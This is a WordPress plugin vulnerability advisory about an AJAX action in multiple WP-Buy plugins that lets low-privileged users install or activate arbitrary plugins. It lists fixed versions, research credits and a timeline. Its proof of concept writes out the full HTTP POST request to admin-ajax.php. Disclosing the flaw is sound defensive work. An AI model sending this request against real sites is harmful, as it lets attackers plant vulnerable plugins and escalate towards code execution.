WordPress Plugin Vulnerabilities
Multiple WP-Buy Plugins - Arbitrary Plugin Installation/Activation via Low Privilege User
Description
Low privileged users could use the AJAX action "cp_plugins_do_button_job_later_callback" from multiple plugins of the WP-Buy vendor, to install any plugin (including a specific version) from the WordPress repository, which helps attackers install vulnerable plugins and could lead to more critical vulnerabilities like RCE. Note (WPScanTeam): The same AJAX action could also be used to activate installed plugins on the blog.
Proof of Concept
Vulnerable code : cp_plugins_do_button_job_later_callback() method in settings-start-index.php file POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Cookie: [Low Privilege User cookie] Content-Type: application/x-www-form-urlencoded Content-Length: 46 action=do_button_job_later&slug=plugin_slug.version To activate installed plugins, use the same request, but with the plugin_file instead of slug parameter
Affects Plugins
Fixed in version 3.1.5
Fixed in version 1.5.2
Fixed in version 2.4 - plugin closed
Fixed in version 1.8.2 - plugin closed
Fixed in version 2.9 - plugin closed
Fixed in version 2.12
Fixed in version 2.9
Fixed in version 1.8
References
Classification
Miscellaneous
Original Researcher
Bugbang
Submitter
Bugbang
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-04-22 (about 1 years ago)
Added
2021-04-22 (about 1 years ago)
Last Updated
2021-04-24 (about 1 years ago)